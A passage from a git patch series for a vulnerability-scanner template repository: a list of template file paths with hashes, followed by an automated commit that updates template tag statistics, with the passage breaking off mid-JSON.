+nuclei-templates/vulnerabilities/wordpress/wp-enabled-registration.yaml:850ce1465fa65fe32622b2aa10f82658b5231cc4 +nuclei-templates/vulnerabilities/wordpress/wp-finder-xss.yaml:f4a7f689bbc02586ae1f1956190da27f86e85cc7 +nuclei-templates/vulnerabilities/wordpress/wp-flagem-xss.yaml:d00f072bdf93fd9d6c05764346cf17f50830fe9d +nuclei-templates/vulnerabilities/wordpress/wp-full-path-disclosure.yaml:0bbf31267d4fc73626d20a6c69f7fe363c683979 +nuclei-templates/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml:fae434011a0238a681f200dbe4c4d4f40d199f08 +nuclei-templates/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml:292dbaed0422932d496274fa5ef18b31a0c2b2fe +nuclei-templates/vulnerabilities/wordpress/wp-haberadam-idor.yaml:cb5c7c8be8f9e20ee513f3f9e62eca395c363f2d +nuclei-templates/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml:e0bfc6ba2375065a5f9c7f0a83d2bc89d1785df7 +nuclei-templates/vulnerabilities/wordpress/wp-insert-php-xss.yaml:2c2c70bfbe6e3d5d73b4a6fe0f22bf23556fcc37 +nuclei-templates/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:4d313c1400fc177019afc54ad22d9c9ce573d6c0 +nuclei-templates/vulnerabilities/wordpress/wp-javospot-lfi.yaml:0b166f7a2b039a81e57199397e78ec4e48a4e40b +nuclei-templates/vulnerabilities/wordpress/wp-knews-xss.yaml:bc3c87da95c4bde64d08851d4fcdaa4112cc2c42 +nuclei-templates/vulnerabilities/wordpress/wp-license-file.yaml:c89277a336515df58b497af52b40c0c3362b8b32 +nuclei-templates/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:e01364448edf2c0a724578a8a57cf0852fd8ef28 +nuclei-templates/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:d9642b2824428d1891f44f17339831be88c2db56 +nuclei-templates/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml:dad7a20fbed69a285f10fba9a6c3584894d0e687 +nuclei-templates/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:20caebbc0abc936fbbc6b918f5051ca56cb64193 +nuclei-templates/vulnerabilities/wordpress/wp-nextgen-xss.yaml:7f530e4ba04d2f252602c95f711323af88d9acc4 +nuclei-templates/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:a96d5beebf1d880c5ed35a65a21276a630ad633b +nuclei-templates/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:f06da3c9c9b33481d7b9951d8b3a911549e9678e +nuclei-templates/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml:4bfad99a5f0046248b4d591f0575328ebc19c811 +nuclei-templates/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml:3b0317585051b2e0e5339bd8a710afa59afb00f3 +nuclei-templates/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml:785a439860f25a93723dcafe70df07a9ca5d8878 +nuclei-templates/vulnerabilities/wordpress/wp-popup-listing.yaml:785ac140e5ea854efe88bf024eccb412e1e4a2b7 +nuclei-templates/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml:26aae9e310c8b2552936bd8cdca7f1e5dc95fc3a +nuclei-templates/vulnerabilities/wordpress/wp-qards-listing.yaml:3e818352aec73dea20601e04c7ed3777d15619c9 +nuclei-templates/vulnerabilities/wordpress/wp-related-post-xss.yaml:b84d07f3648fc0b8168635a1c111ca194d09cdaa +nuclei-templates/vulnerabilities/wordpress/wp-securimage-xss.yaml:b3c4fce836f1220c29ec1a791b791d7c01b08842 +nuclei-templates/vulnerabilities/wordpress/wp-security-open-redirect.yaml:54f34d0f81cc50f1935187402a7f274f1fc8c66d +nuclei-templates/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:5258598f1ab3ab28cbd5bfd5f68e6af49ccde0e2 +nuclei-templates/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:5105c8889e18472944f8fc3c564aa0dbabbbb7aa +nuclei-templates/vulnerabilities/wordpress/wp-slideshow-xss.yaml:ba0a1474e9ad9fcc9157eb318345b5a59a452b5b +nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml:2c781a49b8a301ff767c1bb231379c590a41f1eb +nuclei-templates/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:a4a409a45bc4923031cf85e4a20d40a5b42717e2 +nuclei-templates/vulnerabilities/wordpress/wp-super-forms.yaml:ce9eb9eac78936c43cc1dfd0a35ae4671f943519 +nuclei-templates/vulnerabilities/wordpress/wp-sym404.yaml:d48051d4c7e5ebdd26f506c531ed87045c7afe30 +nuclei-templates/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:0ab3957aebb942c846cd19b1e1da2fe8389738f3 +nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml:292dbe6661c54e43d3481c3178c3a96bd4cb6338 +nuclei-templates/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:c970ec52bb14a792d37c19726e17d99d555b4434 +nuclei-templates/vulnerabilities/wordpress/wp-upload-data.yaml:62566780d8c2e015ebee4488dce5beaea26135eb +nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml:854912ca89135f9ab4fc1d30765c56be1526134b +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:021ed1360130e60b18eda1793a2c564f453d7873 +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:253df0ce904ff53021a48abc1beeb9767cef3096 +nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:6e84667acf3bcbb608d0b66061deed15d9d6628a +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:eb2db9aaa9fe2950c2ace9a4876532c01f1c1d2d +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:3df785987fe4c2f391d16dfccdcc09df00993a33 +nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc.yaml:0968a0581eed95b28eeaa1055c25f1c6545d1c5c +nuclei-templates/vulnerabilities/wordpress/wpdm-cache-session.yaml:f4d9bea1bb98e6a70d1b1dea4d8f9aab6bd8f8da +nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml:a4fe3bf4cd826bf35cf40d5377fcb9fc98452f9d +nuclei-templates/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:ea31f3f2365226fdf4d8633141ece753c86e4bd6 +nuclei-templates/vulnerabilities/wordpress/wptouch-open-redirect.yaml:529bb9502d2081718e82aead62817dc69c8faf9f +nuclei-templates/vulnerabilities/wordpress/wptouch-xss.yaml:802789d17e6ff0383639c99e1d522086b8091258 +nuclei-templates/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:4a4aee1b98be7accd3b2ede7012ca1aba62f94d7 +nuclei-templates/vulnerabilities/yonyou/wooyun-path-traversal.yaml:4cbc19c4e5b0d2103c521ad74c4ce7dc6a9a0430 +nuclei-templates/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:836419d5e5f74b3443a770dee5c6c9a81d3acc92 +nuclei-templates/wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 +nuclei-templates/workflows/74cms-workflow.yaml:361e31c8bbf6b1df6fcb10d7c4929bd2185678af +nuclei-templates/workflows/acrolinx-workflow.yaml:cf70e0bacfae074e25c2eb34ff80fc05672a91b3 +nuclei-templates/workflows/activemq-workflow.yaml:7a951a690804176eac5fbb0e414ee62c36f05abf +nuclei-templates/workflows/adminer-workflow.yaml:37f79f76bbeea61b36139e30487788a54e221e15 +nuclei-templates/workflows/aem-workflow.yaml:9e21e6e590c5e84e10fbc47990bad1db673f6fec +nuclei-templates/workflows/airflow-workflow.yaml:d8247d822e5c101c92f1afb77a1e231459b05549 +nuclei-templates/workflows/ambari-workflow.yaml:4f7361b5d53a50e9b4b6387ec0521855755e5868 +nuclei-templates/workflows/apache-workflow.yaml:71ff50d67b4fc7308bce8269b6d430fa0485d4ec +nuclei-templates/workflows/apereo-cas-workflow.yaml:7edeb7f1fd15adf35e7ed9c0c153ba7e7f1b74a1 +nuclei-templates/workflows/apisix-workflow.yaml:0715357bc298e388e598515e40c6d65f3cdc7d2d +nuclei-templates/workflows/artica-web-proxy-workflow.yaml:fed0fe239f16a1da6661dbdc84f73ddf302cdf51 +nuclei-templates/workflows/artifactory-workflow.yaml:64ec71daf0b84002539a688162d98c53899ebdec +nuclei-templates/workflows/avantfax-workflow.yaml:c308c1bbb2eaa2074cfce142f06c156b2b3b065b +nuclei-templates/workflows/aviatrix-workflow.yaml:c87e369733ebc2c71e64ce875e46ca09bc370223 +nuclei-templates/workflows/axigen-workflow.yaml:3e470c044dc133f5273aa18b7b1f7f2caa70272c +nuclei-templates/workflows/azkaban-workflow.yaml:f72f083e01848ee57f18e3427a237499c999c326 +nuclei-templates/workflows/azure-workflow.yaml:a262ac650f2b721182c72b9475cd06e186131d1b +nuclei-templates/workflows/b2evolution-workflow.yaml:5028ad4cf304d1340f3bab6f71467f7d347576b4 +nuclei-templates/workflows/bigip-workflow.yaml:3f74c06744373fee1b0955f4201ea3959a92e01b +nuclei-templates/workflows/bitrix-workflow.yaml:5a9e6549c849f2b962b45c08fe7038aed2ec28bf +nuclei-templates/workflows/bomgar-workflow.yaml:395e200a90a8658697b0608fd49d09c475001e56 +nuclei-templates/workflows/bullwark-workflow.yaml:5913dd150c3baa4f1fb3cd8ac59497a156b63298 +nuclei-templates/workflows/cacti-workflow.yaml:57f061192a2064a79d19dad580081b1f9405961a +nuclei-templates/workflows/centos-workflow.yaml:5871788f357f8f167148b27076ac41ab413c4565 +nuclei-templates/workflows/chamilo-workflow.yaml:437490e0b06c8c543bfe5eec14c84a6e3498ed65 +nuclei-templates/workflows/checkpoint-workflow.yaml:f45e84626a421dd99a7a8eda60ba6c0eda82d8cb +nuclei-templates/workflows/cherokee-workflow.yaml:cb004f5ba1626e241f278706ce2e7f4381c48b26 +nuclei-templates/workflows/circarlife-workflow.yaml:939d17ad26f49c625a5fc0fa53df86957432ca3e +nuclei-templates/workflows/cisco-asa-workflow.yaml:28931c4448768b0c61587139033e18752149eaf8 +nuclei-templates/workflows/cisco-meraki-workflow.yaml:73e280902d36c72f487e207096327b23057f2dc0 +nuclei-templates/workflows/cockpit-workflow.yaml:b49b6b6d6c5b6375db9d0b19a69136825fab6368 +nuclei-templates/workflows/cocoon-workflow.yaml:99d57081b9236d98514b6bb41ad66fa176f26d7e +nuclei-templates/workflows/coldfusion-workflow.yaml:d15dfe8f9ca99a1a42fc137a3afeae4d4503d2d9 +nuclei-templates/workflows/concrete-workflow.yaml:1a8e0409bde343bb5c86df86e82fc9b93a5f5be4 +nuclei-templates/workflows/confluence-workflow.yaml:93f468076677c54293a788ae5651dc7b7e250ca3 +nuclei-templates/workflows/dahua-workflow.yaml:c3edcf9b8bd86e6302375740c2da3041afe144b0 +nuclei-templates/workflows/dedecms-workflow.yaml:3d1e75495b821b7b18b3502ffd26d64727d1f6cc +nuclei-templates/workflows/default-application-workflow.yaml:1592fc4ec1e83c3e23fe0399e014b44c4353ba1d +nuclei-templates/workflows/dell-idrac-workflow.yaml:a4867b65543b6b32b640a496d28d90394e868e6e +nuclei-templates/workflows/dolibarr-workflow.yaml:e8e90499ad90d72af254fdc1efc9cb1ed122ecbd +nuclei-templates/workflows/dotnetnuke-workflow.yaml:fe4b948daf3ce60322ac20e5d06a449f32b8e5d5 +nuclei-templates/workflows/drupal-workflow.yaml:cfafc6cce0d782528a237834708e711eb16b619a +nuclei-templates/workflows/duomicms-workflow.yaml:c76a80ac7e19ff34f9422b52fcf0870841eda36b +nuclei-templates/workflows/dynamicweb-workflow.yaml:63d372aa0f8ab07bf0d51b4f02fdee077c3e4193 +nuclei-templates/workflows/emby-workflow.yaml:2a1aa30f9952acfe6d3f5b35e19b009b742b16fc +nuclei-templates/workflows/emerge-workflow.yaml:067419c65f2029a1feacd54e3387b1a5d79a445b +nuclei-templates/workflows/episerver-workflow.yaml:441e7f55af2a1ab73673bb7f05970e7c73c9d0ce +nuclei-templates/workflows/feifeicms-workflow.yaml:efc1a02f4fb059f507aa71586e9571d7ea65c12c +nuclei-templates/workflows/finereport-workflow.yaml:e99e1b1cadf73eb3348669c83c609886d4e1c50b +nuclei-templates/workflows/fortinet-workflow.yaml:998f802086ff074b1fe39679720fb0a6b174699d +nuclei-templates/workflows/gateone-workflow.yaml:14f3d98a199b046c4fc4f748269af41bfff0d03f +nuclei-templates/workflows/geowebserver-workflow.yaml:073255617f1cccf5c50f6ecbb9c10a5841c2582d +nuclei-templates/workflows/gespage-workflow.yaml:4040ddf9d6011153bdc0fdf2dabf27a4fd60e90d +nuclei-templates/workflows/gitlab-workflow.yaml:95870fa28bc5970ca4d345c99585db34261208d4 +nuclei-templates/workflows/gitlist-workflow.yaml:b31bee67c369438d1cf53115c78a263c9e19d7fd +nuclei-templates/workflows/glpi-workflow.yaml:a01a11b199ad3559cfe188aff54e8ba18bd738a6 +nuclei-templates/workflows/gocd-workflow.yaml:c8744f907075a1087facf5fda707af8957304840 +nuclei-templates/workflows/gogs-workflow.yaml:40ed949d67707e7886a2d6a4aa3e495c6abfaff0 +nuclei-templates/workflows/google-api-enumeration-workflow.yaml:704ee67a2712f46a03e21b2f0747318aadcb244e +nuclei-templates/workflows/gophish-workflow.yaml:3536230c93abd85614d347d44fb61af477cdaa3e +nuclei-templates/workflows/grafana-workflow.yaml:7ca0343ac44a1fe14e3be93a94c9fde1e45a2bad +nuclei-templates/workflows/graphite-workflow.yaml:5bc6d9b71597e759a8df3b8d7954cc42395f4c4b +nuclei-templates/workflows/grav-workflow.yaml:ff40ca7be110fdeae663c895d27d2a55b2e0327b +nuclei-templates/workflows/gsoap-workflow.yaml:eda1ff7636b8c132091700413939d73c68e1b25d +nuclei-templates/workflows/guacamole-workflow.yaml:526c8958d20330b312d15767cbcff712d8a350a7 +nuclei-templates/workflows/h3c-imc-workflow.yaml:be7cea08800418f986aae8d866cac393f0454de1 +nuclei-templates/workflows/harbor-workflow.yaml:73b7bd25731b5a80c4b32fbfba114ff50870820b +nuclei-templates/workflows/hikvision-workflow.yaml:9eb073664466db9f35e1c3b6d7cff648756227fb +nuclei-templates/workflows/igs-workflow.yaml:dd83b0fc67f9c4cd38021625c5f04f62afff453e +nuclei-templates/workflows/itop-workflow.yaml:3ae72bbee62d15500197cec9b93357664d85659e +nuclei-templates/workflows/jboss-workflow.yaml:8b9e5ebfb41b9362cfeb685f93cc4d6f416f70b2 +nuclei-templates/workflows/jeedom-workflow.yaml:c2e373c7686f3a48a7721f329ebcbdf763a96607 +nuclei-templates/workflows/jellyfin-workflow.yaml:2091900ae719653095ed40f893a92e3762c0d391 +nuclei-templates/workflows/jenkins-workflow.yaml:9d69c8296df914628a3c45ef7c056145ed0c93d2 +nuclei-templates/workflows/jetty-workflow.yaml:2fcabd7081869fac4daf9cceba4889bbeba71dc6 +nuclei-templates/workflows/jira-workflow.yaml:9356850dc15757afde2df5a024003bbd04373209 +nuclei-templates/workflows/joomla-workflow.yaml:78793f762823952fa888df44a2fbefe3b788d869 +nuclei-templates/workflows/kentico-workflow.yaml:2d15de92c0bfd5ea0e3ac029891de88817a3693d +nuclei-templates/workflows/keycloak-workflow.yaml:7260cffff47185649a8a4f7dc16fb64b6e141e75 +nuclei-templates/workflows/kibana-workflow.yaml:0ba6c853d1dc1d8081328cb5db0b6663860b62bd +nuclei-templates/workflows/kindeditor-workflow.yaml:0ac2715d644d554334047424fb5763b26162817b +nuclei-templates/workflows/kong-workflow.yaml:25b72e7446008287f8437a988944cfd314060114 +nuclei-templates/workflows/lanproxy-workflow.yaml:cf49a00a1f27906c74f37e139602b3f735ea21dd +nuclei-templates/workflows/lansweeper-workflow.yaml:ae9182f562f8a5b6ef1eee681599a542a56a8b81 +nuclei-templates/workflows/laravel-workflow.yaml:9d2a5bd003094b12137a4827ebb3ca2a6bdbd8f2 +nuclei-templates/workflows/liferay-workflow.yaml:717a3f035480e680b4113b5d68fd2918b7ae8b3c +nuclei-templates/workflows/lotus-domino-workflow.yaml:70052ea76c8c08042a7d43e6230a807ecd0081b2 +nuclei-templates/workflows/lucee-workflow.yaml:6743598323b1111359812a43f7cc878288dc9c6a +nuclei-templates/workflows/magento-workflow.yaml:4b0b17ebf2328a3913ba78354c7adb581f11df1e +nuclei-templates/workflows/magmi-workflow.yaml:70ec45f5d2d5f4b19542ccad94c3d8b106accfa7 +nuclei-templates/workflows/maian-workflow.yaml:8764ecf2fae4610ff21cd28dee2cb8a8ce2991ce +nuclei-templates/workflows/mantisbt-workflow.yaml:256b4a99fb8e800cd676fb4f6227fdd3fd32c660 +nuclei-templates/workflows/mautic-workflow.yaml:1d1921e57b2e2124814ddacc4dbb506418406efc +nuclei-templates/workflows/metabase-workflow.yaml:4cf6e6508549f46639071dab1b05b13fc76adbf2 +nuclei-templates/workflows/metinfo-workflow.yaml:78c3865880ac656bb2d45bf9a09e4da7e0652c4c +nuclei-templates/workflows/micro-focus-workflow.yaml:35c4b319c699ee236f879cdeda8cb3bf37b905ae +nuclei-templates/workflows/microsoft-exchange-workflow.yaml:e5e8f5d449f10de535caccf26101c7c4853b4775 +nuclei-templates/workflows/microstrategy-workflow.yaml:2880556194560a6836644c2196aae44134b7e6ae +nuclei-templates/workflows/mida-eframework-workflow.yaml:fd299d8fe3244232efa3a9dfb8db7b4ef60d440b +nuclei-templates/workflows/mobileiron-workflow.yaml:d23ece056a8a867297f5209def8ace9a0b0a72c9 +nuclei-templates/workflows/moodle-workflow.yaml:8422a8cfc07828aa4a816f0028a743f6a146ac53 +nuclei-templates/workflows/movable-workflow.yaml:d0cc518d2260163664ba91d6c587eb204045f205 +nuclei-templates/workflows/netgear-workflow.yaml:bc2c3dd0ecab3c713eccd45e4e3c7bc2409d0776 +nuclei-templates/workflows/netsweeper-workflow.yaml:fae6a3ccb6985649aa693626e7a534e8e55911da +nuclei-templates/workflows/nette-workflow.yaml:9e1d36ca5df76c744ae30b700d678f64c40042f2 +nuclei-templates/workflows/node-red-workflow.yaml:c4f211dea07caaecb4558807567d77066d5c136b +nuclei-templates/workflows/novnc-workflow.yaml:80d55370cc9aac3722bc1eccd33a08db6d4683e6 +nuclei-templates/workflows/ofbiz-workflow.yaml:8cc22840dc021c4c2de35a4ef139d9cf3764ff1a +nuclei-templates/workflows/openam-workflow.yaml:5bd678002eb886438f82fed491f2629ecb1877e4 +nuclei-templates/workflows/openemr-workflow.yaml:d6076699c7a90609b73ccff8964652fd390fb1c0 +nuclei-templates/workflows/opensis-workflow.yaml:46d3782e008e73c418da9d4ea611541cc1078ff5 +nuclei-templates/workflows/opensns-workflow.yaml:133e1a5d4a298c15e44244b07708de5916a37873 +nuclei-templates/workflows/oracle-peoplesoft-workflow.yaml:4605c1be7fe030a0d65448ecc4183424c2174c70 +nuclei-templates/workflows/oscommerce-workflow.yaml:4872811ed52d2e04a5b44b131902725e40af0d1b +nuclei-templates/workflows/pandora-workflow.yaml:3fddacd42cc9721a0d4d8cf5ae5d25457b4bece7 +nuclei-templates/workflows/pega-workflow.yaml:b2e421522f325cf7542a7e31ecc684789e6ef000 +nuclei-templates/workflows/pentaho-workflow.yaml:f6a0d2a3b0632ac02ce84831be2872d0ed3baf61 +nuclei-templates/workflows/phpcollab-workflow.yaml:16d51ec188cd34748254464403a548cf60051d3a +nuclei-templates/workflows/phpmyadmin-workflow.yaml:755e0d413890e58cd69c57dfc960cf5e1b03039e +nuclei-templates/workflows/phppgadmin-workflow.yaml:6eac70c55b9b7a680a8042cc76a6d8c201928ac3 +nuclei-templates/workflows/phpwiki-workflow.yaml:8a472c403cc0e3ac889fa642977221a288594caf +nuclei-templates/workflows/powercreator-workflow.yaml:3c289cf12313d76a6f543f4c5f19f203d38a54fa +nuclei-templates/workflows/processmaker-workflow.yaml:537d559b9b9a59c768a5e7e11837e070aebef841 +nuclei-templates/workflows/prometheus-workflow.yaml:922bd3b96edb4059ac30d554c0bf440e184d15c0 +nuclei-templates/workflows/prtg-workflow.yaml:3e1aba3f791749a933b20bd6db66320e4da3920c +nuclei-templates/workflows/pulsesecure-workflow.yaml:35ba4d8fb56538725eaef94ad9467ae6df844eca +nuclei-templates/workflows/qcubed-workflow.yaml:e0e0a3a1794d942d86f58ca16946188218e40ea4 +nuclei-templates/workflows/r-seenet-workflow.yaml:ba2ee6b90f0d368359bca254e8233f37bfd5312a +nuclei-templates/workflows/rabbitmq-workflow.yaml:149c46b46f46656ae774584d6c2f7c0e32b6671a +nuclei-templates/workflows/rancher-workflow.yaml:e6733c148d9fde2a5da7768e1bd86004d1d2ec87 +nuclei-templates/workflows/rconfig-workflow.yaml:329388b703ee1a5ab7cf258515eef09a53f52edd +nuclei-templates/workflows/ricoh-workflow.yaml:53237180cd3c69ca304d5797d0a92f67e8d9058b +nuclei-templates/workflows/rosariosis-workflow.yaml:4dbbf927ac8aa8f07e1b7c4e51cd861ed0461df0 +nuclei-templates/workflows/rstudio-workflow.yaml:e0a330de77902dc038192d435c9fdcaa3903a501 +nuclei-templates/workflows/ruijie-workflow.yaml:cc328047d5c8488d1af9da287f10c112eac7d44e +nuclei-templates/workflows/saltstack-workflow.yaml:7b10b05a872a2c8a5a0b2ea2ad39de04343ebdaa +nuclei-templates/workflows/samsung-wlan-ap-workflow.yaml:65db347ccd86f624eabc1a06c3ce91bd88daecd2 +nuclei-templates/workflows/sap-netweaver-workflow.yaml:38a36f8bf7f6e4ca21cee4306c2395e625efbeb2 +nuclei-templates/workflows/sarg-workflow.yaml:f9f0a58739321cc0605470c6faabc6d377200bd6 +nuclei-templates/workflows/sco-workflow.yaml:35ca48ebc8a3f95a6ac5db6d8bbffdc8a94b19b0 +nuclei-templates/workflows/sequoiadb-workflow.yaml:c13e16182cf4970ef15e76b07d8f1b314d86e69d +nuclei-templates/workflows/sharepoint-workflow.yaml:bc9ed2b9983f515c3204bbfb63db6952d4ac3e27 +nuclei-templates/workflows/shopxo-workflow.yaml:c52cea2020eef05fdf088febd83f64ac2508d7da +nuclei-templates/workflows/sidekiq-workflow.yaml:6e34f1414eada2b605a0160af9c1e0e89a5f6f2b +nuclei-templates/workflows/sitecore-workflow.yaml:851649c062a157af6f7ce07ee90d1744b3f758e2 +nuclei-templates/workflows/skywalking-workflow.yaml:5da71a002bfe30e00eee015b6fafe00086915851 +nuclei-templates/workflows/solarwinds-orion-workflow.yaml:dbdec98a0a1c88a453b6b87f3e8913a530c33355 +nuclei-templates/workflows/solr-workflow.yaml:75c9e056575fc8b4b922c7240493f1901b10ede6 +nuclei-templates/workflows/sonarqube-workflow.yaml:b1f7525817d3d53c2891f224a79e35bc4bbe30fa +nuclei-templates/workflows/sourcebans-workflow.yaml:decfab539d334156a3bf2df245863ec29390bd85 +nuclei-templates/workflows/splunk-workflow.yaml:835a299c31937b9006ce938c46d97fedcb0bcd67 +nuclei-templates/workflows/springboot-workflow.yaml:3bc6cf2a449b03d276c3498ec24cebb40f57b8ea +nuclei-templates/workflows/squirrelmail-workflow.yaml:dff5407b3128d1616b2358e8e184a77af8980d0e +nuclei-templates/workflows/subrion-workflow.yaml:0865d9ee1dfc7d5924d3c416d650a662ce9e8c32 +nuclei-templates/workflows/sugarcrm-workflow.yaml:e0dda278ab6a21236f66c1cf2ab74c01df3c2b08 +nuclei-templates/workflows/symfony-workflow.yaml:5c38cb3f16c28e8a58e1b18a2022ab85b1832254 +nuclei-templates/workflows/sysaid-workflow.yaml:697163819fa2bab567e31837772a6c46bbda5a57 +nuclei-templates/workflows/tapestry-workflow.yaml:10357a46b7ca858abe7497dfe180021100865838 +nuclei-templates/workflows/terramaster-workflow.yaml:00c7173e6e9676382c6697bc9978bb5be9946e10 +nuclei-templates/workflows/thinfinity-workflow.yaml:e77c45ad2bb5fe89a819cfe26824c188c05cf0c9 +nuclei-templates/workflows/thinkadmin-workflow.yaml:1d9fb26797e8033e48afb6f25baf878eb7abee1c +nuclei-templates/workflows/thinkcmf-workflow.yaml:8d50f187be8de285b622aab1ba402bc61a880197 +nuclei-templates/workflows/thinkphp-workflow.yaml:eaaccb8c59778e699704de1ae1cdf4673eb743cb +nuclei-templates/workflows/thruk-workflow.yaml:f5035ab25488e5cd1787a9cf9a1060f888e720d3 +nuclei-templates/workflows/tikiwiki-workflow.yaml:96b5fd29ff05d8f56befb92e3959d27b6d0c310f +nuclei-templates/workflows/tomcat-workflow.yaml:87e732f14c2e7ae7ea4c71bfdcffce3801c461a7 +nuclei-templates/workflows/tongda-workflow.yaml:a0d787a1360ac98472818318fd73b9a3b5187a00 +nuclei-templates/workflows/tpshop-workflow.yaml:c316b8e968a8e639cd74c04dcf21e43c0f09360b +nuclei-templates/workflows/traefik-workflow.yaml:a83aa9e512356c004de49b46d4737f77b14aa07b +nuclei-templates/workflows/umbraco-workflow.yaml:c340f1afa89decde58c0367b78ce9a216f49c99a +nuclei-templates/workflows/vbulletin-workflow.yaml:b44d63825bca5770252aaaf15e4f78faf434a8e8 +nuclei-templates/workflows/vmware-workflow.yaml:70f15613f62ff3e8927b5c66d2c59dc5afb1b302 +nuclei-templates/workflows/voipmonitor-workflow.yaml:e237440e690c00cacf48e6ad5072c101c58b7aaf +nuclei-templates/workflows/weblogic-workflow.yaml:8694ca39d92e94142cd3f333fad689d8d11c30c0 +nuclei-templates/workflows/webmin-workflow.yaml:b63a68fbaaeb5a23ccbc34da3c8401b68620f0c0 +nuclei-templates/workflows/websvn-workflow.yaml:93a94a507c0f1b367956665ba56e355fff92363a +nuclei-templates/workflows/wordpress-workflow.yaml:5ded9d601e03e9945d6c9326c0144cf69a9b81da +nuclei-templates/workflows/worksite-takeover-workflow.yaml:6928845ee99fe726c0b047481c924bde32dd3054 +nuclei-templates/workflows/wuzhicms-workflow.yaml:122706807593ebce13de943a75aab61e4df9c32d +nuclei-templates/workflows/xdcms-workflow.yaml:0c6c0168655b4ccedce9cf109218051d7e352356 +nuclei-templates/workflows/xiuno-workflow.yaml:4b70daaad35d586f53350a2392844e178896ad99 +nuclei-templates/workflows/xxljob-workflow.yaml:17ac43d3a6f989946a68b48906aaeb4f5d4e81e5 +nuclei-templates/workflows/yapi-workflow.yaml:ccbc05dd848b839c31a5264f9da9570d9f18479e +nuclei-templates/workflows/yii-workflow.yaml:4f6a6362938460e5f723f54aaa82be03cad8a9ac +nuclei-templates/workflows/yonyou-nc-workflow.yaml:57927d9591bff2e5fa6696039da95838f453e91f +nuclei-templates/workflows/zabbix-workflow.yaml:558965f0587b7d91bd2ef40a28f9d022dadff760 +nuclei-templates/workflows/zcms-workflow.yaml:374a156202ff7cd4453dd135c17b71a18f29ad0c +nuclei-templates/workflows/zeroshell-workflow.yaml:9e181d4db5ed5ca45a73b8394f808c7785f797f0 +nuclei-templates/workflows/zimbra-workflow.yaml:0ea7b4ec8697b604886660dabf14a893a70b6235 +nuclei-templates/workflows/zzzcms-workflow.yaml:560caa3f54877d16d5a373459ba53d5dd4586fe3 From b9216c24e4bc198970332651b5c0df203ae49c22 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:33:31 +0000 Subject: [PATCH 0235/1133] Auto Generated Templates Stats [Wed Dec 7 09:33:31 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4426 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 2233 insertions(+), 2213 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index c1422e784c..bdf8e733a6 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1551},{"name":"panel","count":778},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":541},{"name":"lfi","count":519},{"name":"wordpress","count":470},{"name":"cve2021","count":369},{"name":"wp-plugin","count":365},{"name":"tech","count":357},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":269},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":222},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":187},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":120},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"router","count":92},{"name":"files","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"devops","count":75},{"name":"takeover","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"atlassian","count":38},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"debug","count":37},{"name":"hackerone","count":37},{"name":"tenable","count":36},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"huntr","count":31},{"name":"kubernetes","count":30},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"n